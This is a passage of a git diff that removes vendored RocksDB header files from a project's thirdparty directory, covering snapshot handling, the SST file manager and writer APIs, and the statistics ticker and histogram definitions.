-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-
-class DB;
-
-// Abstract handle to particular state of a DB.
-// A Snapshot is an immutable object and can therefore be safely
-// accessed from multiple threads without any external synchronization.
-//
-// To Create a Snapshot, call DB::GetSnapshot().
-// To Destroy a Snapshot, call DB::ReleaseSnapshot(snapshot).
-class Snapshot {
- public:
-  // returns Snapshot's sequence number
-  virtual SequenceNumber GetSequenceNumber() const = 0;
-
- protected:
-  virtual ~Snapshot();
-};
-
-// Simple RAII wrapper class for Snapshot.
-// Constructing this object will create a snapshot.  Destructing will
-// release the snapshot.
-class ManagedSnapshot {
- public:
-  explicit ManagedSnapshot(DB* db);
-
-  // Instead of creating a snapshot, take ownership of the input snapshot.
-  ManagedSnapshot(DB* db, const Snapshot* _snapshot);
-
-  ~ManagedSnapshot();
-
-  const Snapshot* snapshot();
-
- private:
-  DB* db_;
-  const Snapshot* snapshot_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/sst_dump_tool.h b/thirdparty/rocksdb/include/rocksdb/sst_dump_tool.h
deleted file mode 100644
index 021faa0..0000000
--- a/thirdparty/rocksdb/include/rocksdb/sst_dump_tool.h
+++ /dev/null
@@ -1,17 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-#pragma once
-
-namespace rocksdb {
-
-class SSTDumpTool {
- public:
-  int Run(int argc, char** argv);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/sst_file_manager.h b/thirdparty/rocksdb/include/rocksdb/sst_file_manager.h
deleted file mode 100644
index 692007d..0000000
--- a/thirdparty/rocksdb/include/rocksdb/sst_file_manager.h
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <memory>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Env;
-class Logger;
-
-// SstFileManager is used to track SST files in the DB and control there
-// deletion rate.
-// All SstFileManager public functions are thread-safe.
-class SstFileManager {
- public:
-  virtual ~SstFileManager() {}
-
-  // Update the maximum allowed space that should be used by RocksDB, if
-  // the total size of the SST files exceeds max_allowed_space, writes to
-  // RocksDB will fail.
-  //
-  // Setting max_allowed_space to 0 will disable this feature, maximum allowed
-  // space will be infinite (Default value).
-  //
-  // thread-safe.
-  virtual void SetMaxAllowedSpaceUsage(uint64_t max_allowed_space) = 0;
-
-  // Return true if the total size of SST files exceeded the maximum allowed
-  // space usage.
-  //
-  // thread-safe.
-  virtual bool IsMaxAllowedSpaceReached() = 0;
-
-  // Return the total size of all tracked files.
-  // thread-safe
-  virtual uint64_t GetTotalSize() = 0;
-
-  // Return a map containing all tracked files and there corresponding sizes.
-  // thread-safe
-  virtual std::unordered_map<std::string, uint64_t> GetTrackedFiles() = 0;
-
-  // Return delete rate limit in bytes per second.
-  // thread-safe
-  virtual int64_t GetDeleteRateBytesPerSecond() = 0;
-
-  // Update the delete rate limit in bytes per second.
-  // zero means disable delete rate limiting and delete files immediately
-  // thread-safe
-  virtual void SetDeleteRateBytesPerSecond(int64_t delete_rate) = 0;
-};
-
-// Create a new SstFileManager that can be shared among multiple RocksDB
-// instances to track SST file and control there deletion rate.
-//
-// @param env: Pointer to Env object, please see "rocksdb/env.h".
-// @param info_log: If not nullptr, info_log will be used to log errors.
-//
-// == Deletion rate limiting specific arguments ==
-// @param trash_dir: Path to the directory where deleted files will be moved
-//    to be deleted in a background thread while applying rate limiting. If this
-//    directory doesn't exist, it will be created. This directory should not be
-//    used by any other process or any other SstFileManager, Set to "" to
-//    disable deletion rate limiting.
-// @param rate_bytes_per_sec: How many bytes should be deleted per second, If
-//    this value is set to 1024 (1 Kb / sec) and we deleted a file of size 4 Kb
-//    in 1 second, we will wait for another 3 seconds before we delete other
-//    files, Set to 0 to disable deletion rate limiting.
-// @param delete_existing_trash: If set to true, the newly created
-//    SstFileManager will delete files that already exist in trash_dir.
-// @param status: If not nullptr, status will contain any errors that happened
-//    during creating the missing trash_dir or deleting existing files in trash.
-extern SstFileManager* NewSstFileManager(
-    Env* env, std::shared_ptr<Logger> info_log = nullptr,
-    std::string trash_dir = "", int64_t rate_bytes_per_sec = 0,
-    bool delete_existing_trash = true, Status* status = nullptr);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/sst_file_writer.h b/thirdparty/rocksdb/include/rocksdb/sst_file_writer.h
deleted file mode 100644
index 04d5c27..0000000
--- a/thirdparty/rocksdb/include/rocksdb/sst_file_writer.h
+++ /dev/null
@@ -1,115 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#pragma once
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/types.h"
-
-#if defined(__GNUC__) || defined(__clang__)
-#define ROCKSDB_DEPRECATED_FUNC __attribute__((__deprecated__))
-#elif _WIN32
-#define ROCKSDB_DEPRECATED_FUNC __declspec(deprecated)
-#endif
-
-namespace rocksdb {
-
-class Comparator;
-
-// ExternalSstFileInfo include information about sst files created
-// using SstFileWriter.
-struct ExternalSstFileInfo {
-  ExternalSstFileInfo() {}
-  ExternalSstFileInfo(const std::string& _file_path,
-                      const std::string& _smallest_key,
-                      const std::string& _largest_key,
-                      SequenceNumber _sequence_number, uint64_t _file_size,
-                      int32_t _num_entries, int32_t _version)
-      : file_path(_file_path),
-        smallest_key(_smallest_key),
-        largest_key(_largest_key),
-        sequence_number(_sequence_number),
-        file_size(_file_size),
-        num_entries(_num_entries),
-        version(_version) {}
-
-  std::string file_path;           // external sst file path
-  std::string smallest_key;        // smallest user key in file
-  std::string largest_key;         // largest user key in file
-  SequenceNumber sequence_number;  // sequence number of all keys in file
-  uint64_t file_size;              // file size in bytes
-  uint64_t num_entries;            // number of entries in file
-  int32_t version;                 // file version
-};
-
-// SstFileWriter is used to create sst files that can be added to database later
-// All keys in files generated by SstFileWriter will have sequence number = 0.
-class SstFileWriter {
- public:
-  // User can pass `column_family` to specify that the generated file will
-  // be ingested into this column_family, note that passing nullptr means that
-  // the column_family is unknown.
-  // If invalidate_page_cache is set to true, SstFileWriter will give the OS a
-  // hint that this file pages is not needed everytime we write 1MB to the file.
-  // To use the rate limiter an io_priority smaller than IO_TOTAL can be passed.
-  SstFileWriter(const EnvOptions& env_options, const Options& options,
-                ColumnFamilyHandle* column_family = nullptr,
-                bool invalidate_page_cache = true,
-                Env::IOPriority io_priority = Env::IOPriority::IO_TOTAL)
-      : SstFileWriter(env_options, options, options.comparator, column_family,
-                      invalidate_page_cache, io_priority) {}
-
-  // Deprecated API
-  SstFileWriter(const EnvOptions& env_options, const Options& options,
-                const Comparator* user_comparator,
-                ColumnFamilyHandle* column_family = nullptr,
-                bool invalidate_page_cache = true,
-                Env::IOPriority io_priority = Env::IOPriority::IO_TOTAL);
-
-  ~SstFileWriter();
-
-  // Prepare SstFileWriter to write into file located at "file_path".
-  Status Open(const std::string& file_path);
-
-  // Add a Put key with value to currently opened file (deprecated)
-  // REQUIRES: key is after any previously added key according to comparator.
-  ROCKSDB_DEPRECATED_FUNC Status Add(const Slice& user_key, const Slice& value);
-
-  // Add a Put key with value to currently opened file
-  // REQUIRES: key is after any previously added key according to comparator.
-  Status Put(const Slice& user_key, const Slice& value);
-
-  // Add a Merge key with value to currently opened file
-  // REQUIRES: key is after any previously added key according to comparator.
-  Status Merge(const Slice& user_key, const Slice& value);
-
-  // Add a deletion key to currently opened file
-  // REQUIRES: key is after any previously added key according to comparator.
-  Status Delete(const Slice& user_key);
-
-  // Finalize writing to sst file and close file.
-  //
-  // An optional ExternalSstFileInfo pointer can be passed to the function
-  // which will be populated with information about the created sst file.
-  Status Finish(ExternalSstFileInfo* file_info = nullptr);
-
-  // Return the current file size.
-  uint64_t FileSize();
-
- private:
-  void InvalidatePageCache(bool closing);
-  struct Rep;
-  std::unique_ptr<Rep> rep_;
-};
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/statistics.h b/thirdparty/rocksdb/include/rocksdb/statistics.h
deleted file mode 100644
index 731ff78..0000000
--- a/thirdparty/rocksdb/include/rocksdb/statistics.h
+++ /dev/null
@@ -1,481 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
-#define STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_
-
-#include <atomic>
-#include <cstddef>
-#include <cstdint>
-#include <string>
-#include <memory>
-#include <vector>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-/**
- * Keep adding ticker's here.
- *  1. Any ticker should be added before TICKER_ENUM_MAX.
- *  2. Add a readable string in TickersNameMap below for the newly added ticker.
- *  3. Add a corresponding enum value to TickerType.java in the java API
- */
-enum Tickers : uint32_t {
-  // total block cache misses
-  // REQUIRES: BLOCK_CACHE_MISS == BLOCK_CACHE_INDEX_MISS +
-  //                               BLOCK_CACHE_FILTER_MISS +
-  //                               BLOCK_CACHE_DATA_MISS;
-  BLOCK_CACHE_MISS = 0,
-  // total block cache hit
-  // REQUIRES: BLOCK_CACHE_HIT == BLOCK_CACHE_INDEX_HIT +
-  //                              BLOCK_CACHE_FILTER_HIT +
-  //                              BLOCK_CACHE_DATA_HIT;
-  BLOCK_CACHE_HIT,
-  // # of blocks added to block cache.
-  BLOCK_CACHE_ADD,
-  // # of failures when adding blocks to block cache.
-  BLOCK_CACHE_ADD_FAILURES,
-  // # of times cache miss when accessing index block from block cache.
-  BLOCK_CACHE_INDEX_MISS,
-  // # of times cache hit when accessing index block from block cache.
-  BLOCK_CACHE_INDEX_HIT,
-  // # of index blocks added to block cache.
-  BLOCK_CACHE_INDEX_ADD,
-  // # of bytes of index blocks inserted into cache
-  BLOCK_CACHE_INDEX_BYTES_INSERT,
-  // # of bytes of index block erased from cache
-  BLOCK_CACHE_INDEX_BYTES_EVICT,
-  // # of times cache miss when accessing filter block from block cache.
-  BLOCK_CACHE_FILTER_MISS,
-  // # of times cache hit when accessing filter block from block cache.
-  BLOCK_CACHE_FILTER_HIT,
-  // # of filter blocks added to block cache.
-  BLOCK_CACHE_FILTER_ADD,
-  // # of bytes of bloom filter blocks inserted into cache
-  BLOCK_CACHE_FILTER_BYTES_INSERT,
-  // # of bytes of bloom filter block erased from cache
-  BLOCK_CACHE_FILTER_BYTES_EVICT,
-  // # of times cache miss when accessing data block from block cache.
-  BLOCK_CACHE_DATA_MISS,
-  // # of times cache hit when accessing data block from block cache.
-  BLOCK_CACHE_DATA_HIT,
-  // # of data blocks added to block cache.
-  BLOCK_CACHE_DATA_ADD,
-  // # of bytes of data blocks inserted into cache
-  BLOCK_CACHE_DATA_BYTES_INSERT,
-  // # of bytes read from cache.
-  BLOCK_CACHE_BYTES_READ,
-  // # of bytes written into cache.
-  BLOCK_CACHE_BYTES_WRITE,
-
-  // # of times bloom filter has avoided file reads.
-  BLOOM_FILTER_USEFUL,
-
-  // # persistent cache hit
-  PERSISTENT_CACHE_HIT,
-  // # persistent cache miss
-  PERSISTENT_CACHE_MISS,
-
-  // # total simulation block cache hits
-  SIM_BLOCK_CACHE_HIT,
-  // # total simulation block cache misses
-  SIM_BLOCK_CACHE_MISS,
-
-  // # of memtable hits.
-  MEMTABLE_HIT,
-  // # of memtable misses.
-  MEMTABLE_MISS,
-
-  // # of Get() queries served by L0
-  GET_HIT_L0,
-  // # of Get() queries served by L1
-  GET_HIT_L1,
-  // # of Get() queries served by L2 and up
-  GET_HIT_L2_AND_UP,
-
-  /**
-   * COMPACTION_KEY_DROP_* count the reasons for key drop during compaction
-   * There are 4 reasons currently.
-   */
-  COMPACTION_KEY_DROP_NEWER_ENTRY,  // key was written with a newer value.
-                                    // Also includes keys dropped for range del.
-  COMPACTION_KEY_DROP_OBSOLETE,     // The key is obsolete.
-  COMPACTION_KEY_DROP_RANGE_DEL,    // key was covered by a range tombstone.
-  COMPACTION_KEY_DROP_USER,  // user compaction function has dropped the key.
-  COMPACTION_RANGE_DEL_DROP_OBSOLETE,  // all keys in range were deleted.
-  // Deletions obsoleted before bottom level due to file gap optimization.
-  COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE,
-
-  // Number of keys written to the database via the Put and Write call's
-  NUMBER_KEYS_WRITTEN,
-  // Number of Keys read,
-  NUMBER_KEYS_READ,
-  // Number keys updated, if inplace update is enabled
-  NUMBER_KEYS_UPDATED,
-  // The number of uncompressed bytes issued by DB::Put(), DB::Delete(),
-  // DB::Merge(), and DB::Write().
-  BYTES_WRITTEN,
-  // The number of uncompressed bytes read from DB::Get().  It could be
-  // either from memtables, cache, or table files.
-  // For the number of logical bytes read from DB::MultiGet(),
-  // please use NUMBER_MULTIGET_BYTES_READ.
-  BYTES_READ,
-  // The number of calls to seek/next/prev
-  NUMBER_DB_SEEK,
-  NUMBER_DB_NEXT,
-  NUMBER_DB_PREV,
-  // The number of calls to seek/next/prev that returned data
-  NUMBER_DB_SEEK_FOUND,
-  NUMBER_DB_NEXT_FOUND,
-  NUMBER_DB_PREV_FOUND,
-  // The number of uncompressed bytes read from an iterator.
-  // Includes size of key and value.
-  ITER_BYTES_READ,
-  NO_FILE_CLOSES,
-  NO_FILE_OPENS,
-  NO_FILE_ERRORS,
-  // DEPRECATED Time system had to wait to do LO-L1 compactions
-  STALL_L0_SLOWDOWN_MICROS,
-  // DEPRECATED Time system had to wait to move memtable to L1.
-  STALL_MEMTABLE_COMPACTION_MICROS,
-  // DEPRECATED write throttle because of too many files in L0
-  STALL_L0_NUM_FILES_MICROS,
-  // Writer has to wait for compaction or flush to finish.
-  STALL_MICROS,
-  // The wait time for db mutex.
-  // Disabled by default. To enable it set stats level to kAll
-  DB_MUTEX_WAIT_MICROS,
-  RATE_LIMIT_DELAY_MILLIS,
-  NO_ITERATORS,  // number of iterators currently open
-
-  // Number of MultiGet calls, keys read, and bytes read
-  NUMBER_MULTIGET_CALLS,
-  NUMBER_MULTIGET_KEYS_READ,
-  NUMBER_MULTIGET_BYTES_READ,
-
-  // Number of deletes records that were not required to be
-  // written to storage because key does not exist
-  NUMBER_FILTERED_DELETES,
-  NUMBER_MERGE_FAILURES,
-
-  // number of times bloom was checked before creating iterator on a
-  // file, and the number of times the check was useful in avoiding
-  // iterator creation (and thus likely IOPs).
-  BLOOM_FILTER_PREFIX_CHECKED,
-  BLOOM_FILTER_PREFIX_USEFUL,
-
-  // Number of times we had to reseek inside an iteration to skip
-  // over large number of keys with same userkey.
-  NUMBER_OF_RESEEKS_IN_ITERATION,
-
-  // Record the number of calls to GetUpadtesSince. Useful to keep track of
-  // transaction log iterator refreshes
-  GET_UPDATES_SINCE_CALLS,
-  BLOCK_CACHE_COMPRESSED_MISS,  // miss in the compressed block cache
-  BLOCK_CACHE_COMPRESSED_HIT,   // hit in the compressed block cache
-  // Number of blocks added to compressed block cache
-  BLOCK_CACHE_COMPRESSED_ADD,
-  // Number of failures when adding blocks to compressed block cache
-  BLOCK_CACHE_COMPRESSED_ADD_FAILURES,
-  WAL_FILE_SYNCED,  // Number of times WAL sync is done
-  WAL_FILE_BYTES,   // Number of bytes written to WAL
-
-  // Writes can be processed by requesting thread or by the thread at the
-  // head of the writers queue.
-  WRITE_DONE_BY_SELF,
-  WRITE_DONE_BY_OTHER,  // Equivalent to writes done for others
-  WRITE_TIMEDOUT,       // Number of writes ending up with timed-out.
-  WRITE_WITH_WAL,       // Number of Write calls that request WAL
-  COMPACT_READ_BYTES,   // Bytes read during compaction
-  COMPACT_WRITE_BYTES,  // Bytes written during compaction
-  FLUSH_WRITE_BYTES,    // Bytes written during flush
-
-  // Number of table's properties loaded directly from file, without creating
-  // table reader object.
-  NUMBER_DIRECT_LOAD_TABLE_PROPERTIES,
-  NUMBER_SUPERVERSION_ACQUIRES,
-  NUMBER_SUPERVERSION_RELEASES,
-  NUMBER_SUPERVERSION_CLEANUPS,
-
-  // # of compressions/decompressions executed
-  NUMBER_BLOCK_COMPRESSED,
-  NUMBER_BLOCK_DECOMPRESSED,
-
-  NUMBER_BLOCK_NOT_COMPRESSED,
-  MERGE_OPERATION_TOTAL_TIME,
-  FILTER_OPERATION_TOTAL_TIME,
-
-  // Row cache.
-  ROW_CACHE_HIT,
-  ROW_CACHE_MISS,
-
-  // Read amplification statistics.
-  // Read amplification can be calculated using this formula
-  // (READ_AMP_TOTAL_READ_BYTES / READ_AMP_ESTIMATE_USEFUL_BYTES)
-  //
-  // REQUIRES: ReadOptions::read_amp_bytes_per_bit to be enabled
-  READ_AMP_ESTIMATE_USEFUL_BYTES,  // Estimate of total bytes actually used.
-  READ_AMP_TOTAL_READ_BYTES,       // Total size of loaded data blocks.
-
-  // Number of refill intervals where rate limiter's bytes are fully consumed.
-  NUMBER_RATE_LIMITER_DRAINS,
-
-  TICKER_ENUM_MAX
-};
-
-// The order of items listed in  Tickers should be the same as
-// the order listed in TickersNameMap
-const std::vector<std::pair<Tickers, std::string>> TickersNameMap = {
-    {BLOCK_CACHE_MISS, "rocksdb.block.cache.miss"},
-    {BLOCK_CACHE_HIT, "rocksdb.block.cache.hit"},
-    {BLOCK_CACHE_ADD, "rocksdb.block.cache.add"},
-    {BLOCK_CACHE_ADD_FAILURES, "rocksdb.block.cache.add.failures"},
-    {BLOCK_CACHE_INDEX_MISS, "rocksdb.block.cache.index.miss"},
-    {BLOCK_CACHE_INDEX_HIT, "rocksdb.block.cache.index.hit"},
-    {BLOCK_CACHE_INDEX_ADD, "rocksdb.block.cache.index.add"},
-    {BLOCK_CACHE_INDEX_BYTES_INSERT, "rocksdb.block.cache.index.bytes.insert"},
-    {BLOCK_CACHE_INDEX_BYTES_EVICT, "rocksdb.block.cache.index.bytes.evict"},
-    {BLOCK_CACHE_FILTER_MISS, "rocksdb.block.cache.filter.miss"},
-    {BLOCK_CACHE_FILTER_HIT, "rocksdb.block.cache.filter.hit"},
-    {BLOCK_CACHE_FILTER_ADD, "rocksdb.block.cache.filter.add"},
-    {BLOCK_CACHE_FILTER_BYTES_INSERT,
-     "rocksdb.block.cache.filter.bytes.insert"},
-    {BLOCK_CACHE_FILTER_BYTES_EVICT, "rocksdb.block.cache.filter.bytes.evict"},
-    {BLOCK_CACHE_DATA_MISS, "rocksdb.block.cache.data.miss"},
-    {BLOCK_CACHE_DATA_HIT, "rocksdb.block.cache.data.hit"},
-    {BLOCK_CACHE_DATA_ADD, "rocksdb.block.cache.data.add"},
-    {BLOCK_CACHE_DATA_BYTES_INSERT, "rocksdb.block.cache.data.bytes.insert"},
-    {BLOCK_CACHE_BYTES_READ, "rocksdb.block.cache.bytes.read"},
-    {BLOCK_CACHE_BYTES_WRITE, "rocksdb.block.cache.bytes.write"},
-    {BLOOM_FILTER_USEFUL, "rocksdb.bloom.filter.useful"},
-    {PERSISTENT_CACHE_HIT, "rocksdb.persistent.cache.hit"},
-    {PERSISTENT_CACHE_MISS, "rocksdb.persistent.cache.miss"},
-    {SIM_BLOCK_CACHE_HIT, "rocksdb.sim.block.cache.hit"},
-    {SIM_BLOCK_CACHE_MISS, "rocksdb.sim.block.cache.miss"},
-    {MEMTABLE_HIT, "rocksdb.memtable.hit"},
-    {MEMTABLE_MISS, "rocksdb.memtable.miss"},
-    {GET_HIT_L0, "rocksdb.l0.hit"},
-    {GET_HIT_L1, "rocksdb.l1.hit"},
-    {GET_HIT_L2_AND_UP, "rocksdb.l2andup.hit"},
-    {COMPACTION_KEY_DROP_NEWER_ENTRY, "rocksdb.compaction.key.drop.new"},
-    {COMPACTION_KEY_DROP_OBSOLETE, "rocksdb.compaction.key.drop.obsolete"},
-    {COMPACTION_KEY_DROP_RANGE_DEL, "rocksdb.compaction.key.drop.range_del"},
-    {COMPACTION_KEY_DROP_USER, "rocksdb.compaction.key.drop.user"},
-    {COMPACTION_RANGE_DEL_DROP_OBSOLETE,
-      "rocksdb.compaction.range_del.drop.obsolete"},
-    {COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE,
-      "rocksdb.compaction.optimized.del.drop.obsolete"},
-    {NUMBER_KEYS_WRITTEN, "rocksdb.number.keys.written"},
-    {NUMBER_KEYS_READ, "rocksdb.number.keys.read"},
-    {NUMBER_KEYS_UPDATED, "rocksdb.number.keys.updated"},
-    {BYTES_WRITTEN, "rocksdb.bytes.written"},
-    {BYTES_READ, "rocksdb.bytes.read"},
-    {NUMBER_DB_SEEK, "rocksdb.number.db.seek"},
-    {NUMBER_DB_NEXT, "rocksdb.number.db.next"},
-    {NUMBER_DB_PREV, "rocksdb.number.db.prev"},
-    {NUMBER_DB_SEEK_FOUND, "rocksdb.number.db.seek.found"},
-    {NUMBER_DB_NEXT_FOUND, "rocksdb.number.db.next.found"},
-    {NUMBER_DB_PREV_FOUND, "rocksdb.number.db.prev.found"},
-    {ITER_BYTES_READ, "rocksdb.db.iter.bytes.read"},
-    {NO_FILE_CLOSES, "rocksdb.no.file.closes"},
-    {NO_FILE_OPENS, "rocksdb.no.file.opens"},
-    {NO_FILE_ERRORS, "rocksdb.no.file.errors"},
-    {STALL_L0_SLOWDOWN_MICROS, "rocksdb.l0.slowdown.micros"},
-    {STALL_MEMTABLE_COMPACTION_MICROS, "rocksdb.memtable.compaction.micros"},
-    {STALL_L0_NUM_FILES_MICROS, "rocksdb.l0.num.files.stall.micros"},
-    {STALL_MICROS, "rocksdb.stall.micros"},
-    {DB_MUTEX_WAIT_MICROS, "rocksdb.db.mutex.wait.micros"},
-    {RATE_LIMIT_DELAY_MILLIS, "rocksdb.rate.limit.delay.millis"},
-    {NO_ITERATORS, "rocksdb.num.iterators"},
-    {NUMBER_MULTIGET_CALLS, "rocksdb.number.multiget.get"},
-    {NUMBER_MULTIGET_KEYS_READ, "rocksdb.number.multiget.keys.read"},
-    {NUMBER_MULTIGET_BYTES_READ, "rocksdb.number.multiget.bytes.read"},
-    {NUMBER_FILTERED_DELETES, "rocksdb.number.deletes.filtered"},
-    {NUMBER_MERGE_FAILURES, "rocksdb.number.merge.failures"},
-    {BLOOM_FILTER_PREFIX_CHECKED, "rocksdb.bloom.filter.prefix.checked"},
-    {BLOOM_FILTER_PREFIX_USEFUL, "rocksdb.bloom.filter.prefix.useful"},
-    {NUMBER_OF_RESEEKS_IN_ITERATION, "rocksdb.number.reseeks.iteration"},
-    {GET_UPDATES_SINCE_CALLS, "rocksdb.getupdatessince.calls"},
-    {BLOCK_CACHE_COMPRESSED_MISS, "rocksdb.block.cachecompressed.miss"},
-    {BLOCK_CACHE_COMPRESSED_HIT, "rocksdb.block.cachecompressed.hit"},
-    {BLOCK_CACHE_COMPRESSED_ADD, "rocksdb.block.cachecompressed.add"},
-    {BLOCK_CACHE_COMPRESSED_ADD_FAILURES,
-     "rocksdb.block.cachecompressed.add.failures"},
-    {WAL_FILE_SYNCED, "rocksdb.wal.synced"},
-    {WAL_FILE_BYTES, "rocksdb.wal.bytes"},
-    {WRITE_DONE_BY_SELF, "rocksdb.write.self"},
-    {WRITE_DONE_BY_OTHER, "rocksdb.write.other"},
-    {WRITE_TIMEDOUT, "rocksdb.write.timeout"},
-    {WRITE_WITH_WAL, "rocksdb.write.wal"},
-    {COMPACT_READ_BYTES, "rocksdb.compact.read.bytes"},
-    {COMPACT_WRITE_BYTES, "rocksdb.compact.write.bytes"},
-    {FLUSH_WRITE_BYTES, "rocksdb.flush.write.bytes"},
-    {NUMBER_DIRECT_LOAD_TABLE_PROPERTIES,
-     "rocksdb.number.direct.load.table.properties"},
-    {NUMBER_SUPERVERSION_ACQUIRES, "rocksdb.number.superversion_acquires"},
-    {NUMBER_SUPERVERSION_RELEASES, "rocksdb.number.superversion_releases"},
-    {NUMBER_SUPERVERSION_CLEANUPS, "rocksdb.number.superversion_cleanups"},
-    {NUMBER_BLOCK_COMPRESSED, "rocksdb.number.block.compressed"},
-    {NUMBER_BLOCK_DECOMPRESSED, "rocksdb.number.block.decompressed"},
-    {NUMBER_BLOCK_NOT_COMPRESSED, "rocksdb.number.block.not_compressed"},
-    {MERGE_OPERATION_TOTAL_TIME, "rocksdb.merge.operation.time.nanos"},
-    {FILTER_OPERATION_TOTAL_TIME, "rocksdb.filter.operation.time.nanos"},
-    {ROW_CACHE_HIT, "rocksdb.row.cache.hit"},
-    {ROW_CACHE_MISS, "rocksdb.row.cache.miss"},
-    {READ_AMP_ESTIMATE_USEFUL_BYTES, "rocksdb.read.amp.estimate.useful.bytes"},
-    {READ_AMP_TOTAL_READ_BYTES, "rocksdb.read.amp.total.read.bytes"},
-    {NUMBER_RATE_LIMITER_DRAINS, "rocksdb.number.rate_limiter.drains"},
-};
-
-/**
- * Keep adding histogram's here.
- * Any histogram should have value less than HISTOGRAM_ENUM_MAX
- * Add a new Histogram by assigning it the current value of HISTOGRAM_ENUM_MAX
- * Add a string representation in HistogramsNameMap below
- * And increment HISTOGRAM_ENUM_MAX
- * Add a corresponding enum value to HistogramType.java in the java API
- */
-enum Histograms : uint32_t {
-  DB_GET = 0,
-  DB_WRITE,
-  COMPACTION_TIME,
-  SUBCOMPACTION_SETUP_TIME,
-  TABLE_SYNC_MICROS,
-  COMPACTION_OUTFILE_SYNC_MICROS,
-  WAL_FILE_SYNC_MICROS,
-  MANIFEST_FILE_SYNC_MICROS,
-  // TIME SPENT IN IO DURING TABLE OPEN
-  TABLE_OPEN_IO_MICROS,
-  DB_MULTIGET,
-  READ_BLOCK_COMPACTION_MICROS,
-  READ_BLOCK_GET_MICROS,
-  WRITE_RAW_BLOCK_MICROS,
-  STALL_L0_SLOWDOWN_COUNT,
-  STALL_MEMTABLE_COMPACTION_COUNT,
-  STALL_L0_NUM_FILES_COUNT,
-  HARD_RATE_LIMIT_DELAY_COUNT,
-  SOFT_RATE_LIMIT_DELAY_COUNT,
-  NUM_FILES_IN_SINGLE_COMPACTION,
-  DB_SEEK,
-  WRITE_STALL,
-  SST_READ_MICROS,
-  // The number of subcompactions actually scheduled during a compaction
-  NUM_SUBCOMPACTIONS_SCHEDULED,
-  // Value size distribution in each operation
-  BYTES_PER_READ,
-  BYTES_PER_WRITE,
-  BYTES_PER_MULTIGET,
-
-  // number of bytes compressed/decompressed
-  // number of bytes is when uncompressed; i.e. before/after respectively
-  BYTES_COMPRESSED,
-  BYTES_DECOMPRESSED,
-  COMPRESSION_TIMES_NANOS,
-  DECOMPRESSION_TIMES_NANOS,
-  // Number of merge operands passed to the merge operator in user read
-  // requests.
-  READ_NUM_MERGE_OPERANDS,
-
-  HISTOGRAM_ENUM_MAX,  // TODO(ldemailly): enforce HistogramsNameMap match
-};
-
-const std::vector<std::pair<Histograms, std::string>> HistogramsNameMap = {
-    {DB_GET, "rocksdb.db.get.micros"},
-    {DB_WRITE, "rocksdb.db.write.micros"},
-    {COMPACTION_TIME, "rocksdb.compaction.times.micros"},
-    {SUBCOMPACTION_SETUP_TIME, "rocksdb.subcompaction.setup.times.micros"},
-    {TABLE_SYNC_MICROS, "rocksdb.table.sync.micros"},
-    {COMPACTION_OUTFILE_SYNC_MICROS, "rocksdb.compaction.outfile.sync.micros"},
-    {WAL_FILE_SYNC_MICROS, "rocksdb.wal.file.sync.micros"},
-    {MANIFEST_FILE_SYNC_MICROS, "rocksdb.manifest.file.sync.micros"},
-    {TABLE_OPEN_IO_MICROS, "rocksdb.table.open.io.micros"},
-    {DB_MULTIGET, "rocksdb.db.multiget.micros"},
-    {READ_BLOCK_COMPACTION_MICROS, "rocksdb.read.block.compaction.micros"},
-    {READ_BLOCK_GET_MICROS, "rocksdb.read.block.get.micros"},
-    {WRITE_RAW_BLOCK_MICROS, "rocksdb.write.raw.block.micros"},
-    {STALL_L0_SLOWDOWN_COUNT, "rocksdb.l0.slowdown.count"},
-    {STALL_MEMTABLE_COMPACTION_COUNT, "rocksdb.memtable.compaction.count"},
-    {STALL_L0_NUM_FILES_COUNT, "rocksdb.num.files.stall.count"},
-    {HARD_RATE_LIMIT_DELAY_COUNT, "rocksdb.hard.rate.limit.delay.count"},
-    {SOFT_RATE_LIMIT_DELAY_COUNT, "rocksdb.soft.rate.limit.delay.count"},
-    {NUM_FILES_IN_SINGLE_COMPACTION, "rocksdb.numfiles.in.singlecompaction"},
-    {DB_SEEK, "rocksdb.db.seek.micros"},
-    {WRITE_STALL, "rocksdb.db.write.stall"},
-    {SST_READ_MICROS, "rocksdb.sst.read.micros"},
-    {NUM_SUBCOMPACTIONS_SCHEDULED, "rocksdb.num.subcompactions.scheduled"},
-    {BYTES_PER_READ, "rocksdb.bytes.per.read"},
-    {BYTES_PER_WRITE, "rocksdb.bytes.per.write"},
-    {BYTES_PER_MULTIGET, "rocksdb.bytes.per.multiget"},
-    {BYTES_COMPRESSED, "rocksdb.bytes.compressed"},
